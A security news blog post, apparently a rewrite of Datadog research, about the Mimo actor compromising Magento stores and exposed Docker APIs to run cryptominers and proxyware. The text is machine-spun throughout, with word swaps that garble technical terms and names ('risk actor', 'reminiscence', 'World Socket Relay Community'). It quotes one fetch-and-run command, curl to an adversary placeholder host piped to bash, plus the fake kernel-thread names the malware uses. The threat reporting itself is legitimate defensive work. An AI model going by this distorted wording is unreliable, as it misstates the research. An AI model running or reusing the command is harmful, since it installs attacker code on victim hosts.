Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization

Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization

Posted on July 24, 2025July 24, 2025 By CWS

The cybersecurity panorama faces a brand new risk because the infamous Mimo risk actor, beforehand identified for focusing on Craft content material administration programs, has considerably advanced its operations to compromise Magento ecommerce platforms.

This growth represents a harmful shift towards high-value targets the place monetary knowledge info are routinely processed, marking a regarding escalation within the group’s felony actions.

Mimo’s newest marketing campaign demonstrates subtle technical capabilities, exploiting undetermined PHP-FPM vulnerabilities to achieve preliminary entry to Magento installations.

The risk actor has developed a multi-pronged monetization technique that mixes conventional cryptocurrency mining with bandwidth theft via residential proxy networks.

This twin strategy permits the attackers to extract most worth from compromised programs whereas sustaining persistent entry to precious ecommerce environments.

DATADOG Safety Labs researchers recognized this evolution throughout investigations into a number of workload compromises affecting ecommerce websites all through 2025.

The safety crew found that Mimo had not solely expanded its goal scope however had additionally launched superior persistence mechanisms and complex evasion methods that considerably improve the risk’s operational safety and longevity on compromised programs.

The risk actor’s operations lengthen past Magento platforms, with researchers uncovering proof of Docker container compromises via misconfigured Docker Engine API endpoints.

Mimo Exploitation (Supply – DATADOG Safety Labs)

When focusing on Docker environments, Mimo employs the command curl http://[adversary-controlled-infrastructure]/cron.jpg?docker | bash to provoke the an infection chain, demonstrating the group’s adaptability throughout various infrastructure sorts.

Superior Persistence and Evasion Mechanisms

Mimo’s most important tactical development entails implementing GSocket, a reputable penetration testing device, for establishing persistent command and management channels.

This device permits encrypted communication via the World Socket Relay Community utilizing AES-256-CBC encryption, successfully bypassing firewalls and community tackle translation boundaries that may usually block malicious visitors.

The malware employs subtle course of masquerading methods, choosing random names from a hardcoded record together with [kstrp], [watchdogd], [ksmd], and [kswapd0] to mix seamlessly with reputable kernel processes.

Maybe most regarding is Mimo’s implementation of the memfd_create() syscall, which creates nameless momentary information immediately in reminiscence, permitting the malware to execute fully with out leaving conventional filesystem artifacts that safety instruments usually monitor.

Enhance detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Strive ANY.RUN Now

Cyber Security News Tags:Actor, Attacking, Bandwidth, Card, CMS, Details, Magento, Mimo, Monetization, Steal, Threat

Post navigation

Previous Post: Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access
Next Post: Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cybercrime Marketplace

Related Posts

Hidden Malware in Open VSX Extension Threatens Developers Hidden Malware in Open VSX Extension Threatens Developers Cyber Security News
LexisNexis Risk Solutions Data Breach Exposes 364,000 individuals personal Data LexisNexis Risk Solutions Data Breach Exposes 364,000 individuals personal Data Cyber Security News
Two U.S. CyberSecurity Pros Plead Guilty for Working as ALPHV/BlackCat Affiliates Two U.S. CyberSecurity Pros Plead Guilty for Working as ALPHV/BlackCat Affiliates Cyber Security News
Sensitive Employee Data Breach at Natural Resources Wales Sensitive Employee Data Breach at Natural Resources Wales Cyber Security News
North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging Cyber Security News
Cyber Threats: Fake Google Gemini Installer Distributes Vidar Stealer Cyber Threats: Fake Google Gemini Installer Distributes Vidar Stealer Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • F-Droid 2.0 Debuts with Major Redesign for App Discovery
  • China and US to Create AI Safety Channel Amid Ongoing Talks
  • Lunex Stealer Exploits AMD Driver for Credential Theft
  • Local AI Model Evades EDR Detection with Modified Credential Dumper
  • Enhancing AI Agent Security with Zero Trust Principles

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2026
  • August 2026
  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • F-Droid 2.0 Debuts with Major Redesign for App Discovery
  • China and US to Create AI Safety Channel Amid Ongoing Talks
  • Lunex Stealer Exploits AMD Driver for Credential Theft
  • Local AI Model Evades EDR Detection with Modified Credential Dumper
  • Enhancing AI Agent Security with Zero Trust Principles

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark